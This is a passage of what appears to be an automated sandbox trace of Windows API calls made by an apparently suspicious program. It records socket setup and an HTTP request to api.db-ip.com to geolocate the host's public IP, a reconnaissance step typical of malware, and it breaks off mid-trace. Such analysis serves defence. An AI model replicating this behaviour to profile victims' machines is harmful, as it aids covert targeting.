GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] ResetEvent (hEvent=0x3f4) returned 1 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] ResetEvent (hEvent=0x3f4) returned 1 [0103.042] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x1d7)) [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] SetEvent (hEvent=0x3f0) returned 1 [0103.042] SetEvent (hEvent=0x3f4) returned 1 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] ResetEvent (hEvent=0x3f4) returned 1 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] ResetEvent (hEvent=0x3f4) returned 1 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.042] GetCurrentThreadId () returned 0x1358 [0103.043] SetEvent (hEvent=0x3f0) returned 1 [0103.043] SetEvent (hEvent=0x3f4) returned 1 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] ResetEvent (hEvent=0x3f4) returned 1 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] ResetEvent (hEvent=0x3f4) returned 1 [0103.043] CloseHandle (hObject=0x3f4) returned 1 [0103.043] CloseHandle (hObject=0x3f0) returned 1 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] GetCurrentThreadId () returned 0x1358 [0103.043] shutdown (s=0x3d0, how=1) returned 0 [0103.043] closesocket (s=0x3d0) returned 0 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.044] GetCurrentThreadId () returned 0x1358 [0103.045] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.045] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.045] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.045] GetCurrentThreadId () returned 0x1358 [0103.045] GetCurrentThreadId () returned 0x1358 [0103.045] GetCurrentThreadId () returned 0x1358 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0103.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0103.046] socket (af=2, type=1, protocol=0) returned 0x3d0 [0103.047] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0103.047] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0103.047] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0103.047] htons (hostshort=0x0) returned 0x0 [0103.047] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0103.047] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc21d, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0103.047] htons (hostshort=0x1dc2) returned 0xc21d [0103.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0103.047] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1e8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0103.048] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1e8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0103.048] htons (hostshort=0x50) returned 0x5000 [0103.048] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0103.068] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc21d, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0103.068] htons (hostshort=0x1dc2) returned 0xc21d [0103.068] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0103.068] htons (hostshort=0x5000) returned 0x50 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0103.068] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] GetCurrentThreadId () returned 0x1358 [0103.068] send (s=0x3d0, buf=0x24049b8*, len=198, flags=0) returned 198 [0103.069] GetTickCount64 () returned 0x115b0fd [0103.069] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0103.102] recv (in: s=0x3d0, buf=0x242e938, len=32768, flags=0 | out: buf=0x242e938*) returned 503 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] GetTickCount64 () returned 0x115b12c [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0103.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0103.105] GetCurrentThreadId () returned 0x1358 [0103.105] GetCurrentThreadId () returned 0x1358 [0103.105] GetCurrentThreadId () returned 0x1358 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] 